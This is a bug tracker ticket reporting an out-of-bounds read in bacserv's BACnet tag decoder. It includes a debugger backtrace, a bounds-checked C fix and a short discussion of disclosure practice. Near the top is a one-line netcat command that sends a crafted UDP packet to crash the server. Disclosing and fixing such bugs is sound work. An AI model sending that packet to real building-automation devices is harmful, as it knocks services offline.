
#62 Invalid read in bacserv when decoding alarm tags

v0.8.6
accepted
1
2019-06-15
2019-05-28
Anonymous
No

bacserv contains an invalid read in bacdcode.c when parsing alarm tag numbers. This leads to bacserv crashing. You can test with the following:
echo -ne "\x81\x04\x00\xa6\xc0\xa8F\x8d\x88\xa2\x01\x07\x00\x00\x00\x00\r\xff\xff" | nc -u $IP 47808

───────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────
► 0x5555555a1e8d <decode_tag_number+44> mov al, byte ptr [rbp]
0x5555555a1e90 <decode_tag_number+47> mov dl, al
0x5555555a1e92 <decode_tag_number+49> and edx, 0xfffffff0
0x5555555a1e95 <decode_tag_number+52> cmp dl, 0xf0
0x5555555a1e98 <decode_tag_number+55> jne decode_tag_number+178 <0x5555555a1f13>

0x5555555a1f13 <decode_tag_number+178> test rbx, rbx
0x5555555a1f16 <decode_tag_number+181> je decode_tag_number+266 <0x5555555a1f6b>

0x5555555a1f6b <decode_tag_number+266> mov eax, 1
0x5555555a1f70 <decode_tag_number+271> pop rdx
0x5555555a1f71 <decode_tag_number+272> pop rbx
0x5555555a1f72 <decode_tag_number+273> pop rbp
────────────────────────────────────────────────────────────────────────────────[ STACK ]────────────────────────────────────────────────────────────────────────────────
00:0000│ rsp 0x7fffffffd600 —▸ 0x5555555a20af (decode_tag_number_and_value) ◂— 0x5441554156415741
01:0008│ 0x7fffffffd608 —▸ 0x7fffffffd630 ◂— 0x41b58ab3
02:0010│ 0x7fffffffd610 ◂— 0x55555482e18f
03:0018│ 0x7fffffffd618 —▸ 0x5555555a2974 (decode_is_context_tag_with_length+193) ◂— 0x8244c8b48f6894c
04:0020│ 0x7fffffffd620 —▸ 0x7fffffffd630 ◂— 0x41b58ab3
05:0028│ 0x7fffffffd628 —▸ 0x7fffffffd650 —▸ 0xff010000 ◂— 0x0
06:0030│ 0x7fffffffd630 ◂— 0x41b58ab3
07:0038│ 0x7fffffffd638 —▸ 0x5555555d9e01 ◂— 0x3120312032332031 / '1 32 1 13 my_tag_number ' /
──────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]──────────────────────────────────────────────────────────────────────────────
► f 0 5555555a1e8d decode_tag_number+44
f 1 5555555a2974 decode_is_context_tag_with_length+193
f 2 5555555a35ad decode_context_object_id+207
f 3 5555555d1d77 alarm_ack_decode_service_request+187
f 4 5555555be291 handler_alarm_ack+487
f 5 5555555a137f apdu_handler+1269
f 6 5555555ba123 npdu_handler+629
f 7 55555557d1b2 main+801
f 8 7ffff6a4ab97 __libc_start_main+231
Program received signal SIGSEGV (fault address 0x55555482e18f)
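The backtrace shows decode_tag_number reading the tag octet at [rbp] with no idea how many octets of the received APDU remain, so a packet that ends exactly where a tag (or its extended-tag second octet, or the object identifier that follows) should begin sends the read past the buffer. As an added example, written for this page and not taken from the reporter or from the bacnet-stack sources, the functions below mirror the three frames decode_tag_number / context-tag check / decode_context_object_id but thread the remaining length through every step and refuse to read when it is exhausted. The BACnet tag octet layout (tag number in the high nibble, 0xF meaning the number is in the next octet, bit 3 = context class, low 3 bits = length) is the standard encoding; the function names, the apdu_len parameter and the byte buffers are assumptions constructed for the example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* BACnet tag octet: bits 7..4 tag number (0xF = extended, number in the
 * next octet), bit 3 class (1 = context-specific), bits 2..0 length/value.
 * Decodes the tag number without reading past apdu_len.
 * Returns octets consumed (1 or 2), or 0 if the buffer is too short. */
size_t decode_tag_number_checked(const uint8_t *apdu, size_t apdu_len,
                                 uint8_t *tag_number)
{
    if (apdu == NULL || apdu_len < 1) {
        return 0; /* the unchecked decoder would read apdu[0] here anyway */
    }
    if ((apdu[0] & 0xF0) == 0xF0) {
        if (apdu_len < 2) {
            return 0; /* extended tag number would be one octet past the end */
        }
        if (tag_number) {
            *tag_number = apdu[1];
        }
        return 2;
    }
    if (tag_number) {
        *tag_number = (uint8_t)(apdu[0] >> 4);
    }
    return 1;
}

/* Decodes a context-tagged Object Identifier (tag octet + 4 data octets,
 * 10-bit object type and 22-bit instance). Returns octets consumed, or 0
 * if the tag is absent, of the wrong class/number/length, or truncated. */
size_t decode_context_object_id_checked(const uint8_t *apdu, size_t apdu_len,
                                        uint8_t expected_tag,
                                        uint16_t *object_type,
                                        uint32_t *instance)
{
    uint8_t tag = 0;
    size_t len = decode_tag_number_checked(apdu, apdu_len, &tag);
    if (len == 0) {
        return 0;
    }
    bool is_context = (apdu[0] & 0x08) != 0;
    uint8_t lvt = apdu[0] & 0x07; /* length/value/type field */
    if (!is_context || tag != expected_tag || lvt != 4) {
        return 0;
    }
    if (apdu_len - len < 4) {
        return 0; /* object identifier data octets are missing */
    }
    uint32_t v = ((uint32_t)apdu[len] << 24) | ((uint32_t)apdu[len + 1] << 16) |
                 ((uint32_t)apdu[len + 2] << 8) | (uint32_t)apdu[len + 3];
    if (object_type) {
        *object_type = (uint16_t)(v >> 22);
    }
    if (instance) {
        *instance = v & 0x3FFFFFu;
    }
    return len + 4;
}

int main(void)
{
    /* constructed sample: context tag 0, length 4, device object 1234 */
    const uint8_t complete[] = {0x0C, 0x02, 0x00, 0x04, 0xD2};
    /* constructed sample: the same field cut off after two data octets */
    const uint8_t truncated[] = {0x0C, 0x02, 0x00};
    uint16_t type = 0;
    uint32_t inst = 0;

    size_t n = decode_context_object_id_checked(complete, sizeof complete, 0,
                                                &type, &inst);
    printf("complete: consumed %zu, type %u, instance %u\n", n, type, inst);
    n = decode_context_object_id_checked(truncated, sizeof truncated, 0,
                                         &type, &inst);
    printf("truncated: consumed %zu (0 = rejected, no out-of-bounds read)\n", n);
    return 0;
}
```

The pattern to carry through a decoder is that every function takes the remaining length, checks it before each read, and returns 0 (rather than a partial result) so the caller can drop the APDU instead of continuing to parse from beyond the buffer.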

Discussion

  • Anonymous - 2019-06-08

    Nice catch, I sent the same and more issues like this on #61. Also, from my point of view, these issues should follow a Coordinated Vulnerability Disclosure (CVD). This process allows independent reporters who discover a vulnerability to contact the product owner directly and allows them the opportunity to investigate and remediate the vulnerability before the reporter discloses the information to the public... And also a CVE was created without any product owner knowledge... so not nice from your side, to be honest.

  • Steve Karg - 2019-06-15
    • status: open --> accepted
    • assigned_to: Steve Karg